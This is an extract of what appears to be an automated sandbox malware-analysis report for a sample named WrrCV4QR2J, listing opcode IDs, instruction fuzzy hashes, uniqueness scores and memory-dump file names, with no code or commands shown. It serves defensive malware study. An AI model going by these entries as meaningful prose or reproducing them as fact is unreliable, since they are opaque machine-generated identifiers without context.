                                                                                                                                                              • Instruction Fuzzy Hash: CC11C1317006519BDB15CF5DE4C5A2AFBE9BF8A710B1980ADEE0ADF205D6B2D901C790
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                                                              • Instruction ID: 91ffada30413afe15eb7f443710496c9e588e0aee40cf7a6cdb37a91a86b7496
                                                                                                                                                              • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                                                              • Instruction Fuzzy Hash: F921BE7168060ADFDB369F49C540A2AFBE6FB94B50F50887DE54A9F620C730EC00CB40
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                              • Instruction ID: 4208f66c389d291396c2757c56e624d8b1d60d097392cabea6cbf48ba4597d24
                                                                                                                                                              • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                              • Instruction Fuzzy Hash: D411C2716026C29BEB329B2C9944B2D3BD4FB41B88F1904A2DA429F652F728D843C352
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                              • Instruction ID: 2b00b54a2c1ca140e3dde455a11e7a1f5b2d1d9c54b26cbc9c7113f78677fea5
                                                                                                                                                              • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                              • Instruction Fuzzy Hash: B0019232602146AFE721AF5CCD02F5ABAA9FB85750F168428EB05AF270E775DD40C790
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                              • Instruction ID: 55e35b1fac1fd83e57696cfae02ebab36ccb9063a65328627d5bc4372ed343b2
                                                                                                                                                              • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                              • Instruction Fuzzy Hash: 040126314447229BDB318F19D840A367BE8FF55760700896DFC96AF281D331D400CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 296711427f90211866cff10b0b5b260726643bbf3e1be23340f36a0fa9436b66
                                                                                                                                                              • Instruction ID: 11166a3a5eca6101492d51ecc8e9f768ed8fca1b4a7d187b514f59cf9dc3d3d7
                                                                                                                                                              • Opcode Fuzzy Hash: 296711427f90211866cff10b0b5b260726643bbf3e1be23340f36a0fa9436b66
                                                                                                                                                              • Instruction Fuzzy Hash: 5311AD32651242EFDB15EF19DD81F56BBB8FF94B44F2000A5EA059F661C635ED01CA90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 135cfa16ad678bac9510e19088cfaf76cd98442bec255cc1a4bfbc53d4b1937b
                                                                                                                                                              • Instruction ID: a2e339f6cb7052ea6f620ccfa58911ad9ef1228b87642efc463d723bf3ee8824
                                                                                                                                                              • Opcode Fuzzy Hash: 135cfa16ad678bac9510e19088cfaf76cd98442bec255cc1a4bfbc53d4b1937b
                                                                                                                                                              • Instruction Fuzzy Hash: 0C115E7054122AABEF65AF64CC82FEDB2B4BF44710F504194A324AA0E0DA70AE81CF94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 83dda75c221796388743eaa200a2ccb3b357b68a47e5f4cb738b4da6949dd922
                                                                                                                                                              • Instruction ID: 2ac4f2b92756c2e6e39296b3f68664d06239efe1723453a7b77a254dc99f09fc
                                                                                                                                                              • Opcode Fuzzy Hash: 83dda75c221796388743eaa200a2ccb3b357b68a47e5f4cb738b4da6949dd922
                                                                                                                                                              • Instruction Fuzzy Hash: 8111D77390011AABCB15DB94CC94DDFBBBCFF58254F044166EA06EB211EA34AA55CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                              • Instruction ID: ee1d7faa60599fa84917f937138020f5a9ddfb8b4288638e5f80a610a5ac88cc
                                                                                                                                                              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                              • Instruction Fuzzy Hash: ED0147362011118FEF169E6DE880B9A77B7BFC4B00F5544AAED058F246DA71DC81C3A0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 21d21677980f7d488747ca7bf781c9477a008ac22f8e0b6c0915308e2a7aee26
                                                                                                                                                              • Instruction ID: 848ed07a314491f899c25edbc24eb49bd450bc5526e98011106b1df3faa4e871
                                                                                                                                                              • Opcode Fuzzy Hash: 21d21677980f7d488747ca7bf781c9477a008ac22f8e0b6c0915308e2a7aee26
                                                                                                                                                              • Instruction Fuzzy Hash: AD11A5326441469FD716CF58DC00BA6B7B5FB9A314F088159E8458F395D732EC55CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 58c0576cd05503e1f7d20f84b74d655c0a37faf74f8f137ba48dd160cbfdbe1a
                                                                                                                                                              • Instruction ID: 341cf1b0a6cccf061350782438c0ff32eb4606aaa43cb31368de9a81d57f1d65
                                                                                                                                                              • Opcode Fuzzy Hash: 58c0576cd05503e1f7d20f84b74d655c0a37faf74f8f137ba48dd160cbfdbe1a
                                                                                                                                                              • Instruction Fuzzy Hash: 1111ECB1A0020EDBCB04DF99D585A9EBBF4FF58650F10406AE905FB351D674EA018BA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: cff40075591d6d41b88d49e52af62e26052523a6f51d85bdddeb59380370d3a5
                                                                                                                                                              • Instruction ID: 4ca4565d038a2095d8e6264e6fe344f9b198084a847275f53f32c8f416dc0cca
                                                                                                                                                              • Opcode Fuzzy Hash: cff40075591d6d41b88d49e52af62e26052523a6f51d85bdddeb59380370d3a5
                                                                                                                                                              • Instruction Fuzzy Hash: 2F0171365402129BD733BE19CC40D76BFA9FF92651B09442EEE456F715CB22DC81CBA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                              • Instruction ID: af59be2c3072b01f3e883dcf979f4139df0696e45b7c2aa0d19351e9bced25c8
                                                                                                                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                              • Instruction Fuzzy Hash: 41F0C2B2A00615ABD324CF4DDC40E5BFBEAEBD1A80F048128A605DB220EA31ED04CB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                              • Instruction ID: a586657cd072a194c06738ae71075692aad6e3a5657a6630bcc475c5cdd0fc1c
                                                                                                                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                              • Instruction Fuzzy Hash: 1BF0FC733046239BD7321659C840B2FB99DBFD1A64F194135E2459F204C9648D0156E0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                                              • Instruction ID: b1c1917f87863e707d3cb4c262e24e38049ac9311e16f59e4594cffb9324c9f1
                                                                                                                                                              • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                                              • Instruction Fuzzy Hash: 8F01F432640A869BD7369B1DC809F6DBFD8FF81754F0844A5FA049F6A2D7B8D800C210
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 220f3e9eb47494fefbbcc2d33925424b280b478d53dcd4f9cc466367b2ef6c0a
                                                                                                                                                              • Instruction ID: 5d72543db622be75926a3e88288366b4ceb87d7a68b04cda766796c3eccc7ed7
                                                                                                                                                              • Opcode Fuzzy Hash: 220f3e9eb47494fefbbcc2d33925424b280b478d53dcd4f9cc466367b2ef6c0a
                                                                                                                                                              • Instruction Fuzzy Hash: 94018F71A0024AEBCB00DFA9D845AEEBBF8BF58710F14405AE501FB380D774EA01CB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                              • Instruction ID: aad231a147cc9a1a1e257aa4d21eb82cef7bd1d749037469ed572581c040bb80
                                                                                                                                                              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                              • Instruction Fuzzy Hash: C9F0127220001EBFEF019F94DD80DAF7B7DFF95698B104125FA1196160D631DD21A7A0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 0ec89431aed69f2cca7d8c4d534dbc425b44066b2ef2a07bbbcdff56e739f483
                                                                                                                                                              • Instruction ID: dc92d86cc2773c2afd1fd76ab0a62665ba7cbed018ee557c9f2f97f05703b56e
                                                                                                                                                              • Opcode Fuzzy Hash: 0ec89431aed69f2cca7d8c4d534dbc425b44066b2ef2a07bbbcdff56e739f483
                                                                                                                                                              • Instruction Fuzzy Hash: 07019736100249ABCF129F84DC44EDE7FA6FB4C7A4F068105FE196A220C732D970EB82
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c7b5f6dce3e0dbbe4d5aff983964a757d748511504ca1f8191fe565e857858b0
                                                                                                                                                              • Instruction ID: 4d96f60cd30ed3b5e8b035a33471cc4e534559c7f7534030c20070c533226006
                                                                                                                                                              • Opcode Fuzzy Hash: c7b5f6dce3e0dbbe4d5aff983964a757d748511504ca1f8191fe565e857858b0
                                                                                                                                                              • Instruction Fuzzy Hash: 10F024716042429FF32096199C02B6232DEFBC4654F25842AEB498F6C1EA70DC4183D4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 48149085becc0eb73a630cbfad2eee42aa0fc16d663c795500aade074078e2a3
                                                                                                                                                              • Instruction ID: 995ba2f3589982c571a09e68c92605ceb1e0de56e580a338f6b124ffd24047b0
                                                                                                                                                              • Opcode Fuzzy Hash: 48149085becc0eb73a630cbfad2eee42aa0fc16d663c795500aade074078e2a3
                                                                                                                                                              • Instruction Fuzzy Hash: F601F4706406828BE736AF2CCD4CB2D3BE4BB88B80F8C0590FA41DFAE2D728D4418610
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                              • Instruction ID: 65ba9ac954c978f6f193388300dff0e5572f3e0deb6083acb6bbddb8362169a1
                                                                                                                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                              • Instruction Fuzzy Hash: 60F08935341D2347EB76AA2F9C20B2EA655AFD0B50B1D052E9655CB794DF60D8018790
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                              • Instruction ID: b93de18baabd52efcc8837abd18e31f11ba02e6a440e4f3a6f04097b8b24660c
                                                                                                                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                              • Instruction Fuzzy Hash: 7FF054737115129BD321AA4DCC81F16B7A9FFD5A60F1A0469A704AF270C760EC0187D0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                              • Instruction ID: 95108752bf31d12f674a1391e9d245c889278fd30186ff5ac3498f9a433dc865
                                                                                                                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                              • Instruction Fuzzy Hash: ACD01236100249EFCB01DF45C890D9A772EFBD8710F508419FD190B6508A31ED62DA50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                              • Instruction ID: c2f3d8cd2d621b23af5a91424f932e0bc1c116802548750d633c125c6e067478
                                                                                                                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                              • Instruction Fuzzy Hash: 2AC04C757015428FCF15DF59D294F4977E4F744B40F150890E805DF721E724F801CA10
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 98183aa43f9b2ec6a3be190eead3bd8a04b504adfb32af476c4b2cee75c087f4
                                                                                                                                                              • Instruction ID: 9249ccee82258bddb0fff522466acb58adbf8f95aa7c3c5cedab00141bb80ea9
                                                                                                                                                              • Opcode Fuzzy Hash: 98183aa43f9b2ec6a3be190eead3bd8a04b504adfb32af476c4b2cee75c087f4
                                                                                                                                                              • Instruction Fuzzy Hash: D5900231605800169140759D4C845464045B7E0711B59C415E0424954CCA558A565361
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 26acf4a3d436f7e834205f0e04bdc53cf3d6cd7bceea747c4e0004b108edea05
                                                                                                                                                              • Instruction ID: 3638d74b19135ef9d98eb0ea4a07e5882e03511c0697504439396ee3391c8512
                                                                                                                                                              • Opcode Fuzzy Hash: 26acf4a3d436f7e834205f0e04bdc53cf3d6cd7bceea747c4e0004b108edea05
                                                                                                                                                              • Instruction Fuzzy Hash: 24900261601500464140759D4C044066045B7E1711399C519A0554960CC65989559369
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 92cc37e66af7ad5fbf7533d84c692f4a72afc6472ca683eb5dc3bd2516fd9024
                                                                                                                                                              • Instruction ID: 89e632664a87a4634adc1e579d19482afe955a97c99a2771cb3cddc2ca3795f3
                                                                                                                                                              • Opcode Fuzzy Hash: 92cc37e66af7ad5fbf7533d84c692f4a72afc6472ca683eb5dc3bd2516fd9024
                                                                                                                                                              • Instruction Fuzzy Hash: 6A90023120140806D180759D480464A0045A7D1711F99C419A0025A54DCA568B5977A1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 9d18ee9ea872efe2854aca85b033fe11e773f2279f537a11c403bae219672f03
                                                                                                                                                              • Instruction ID: 24e32efcb2c72b4e7f5b9881673f9d6a54a5db6d1a00de9db26a7a39266c0a15
                                                                                                                                                              • Opcode Fuzzy Hash: 9d18ee9ea872efe2854aca85b033fe11e773f2279f537a11c403bae219672f03
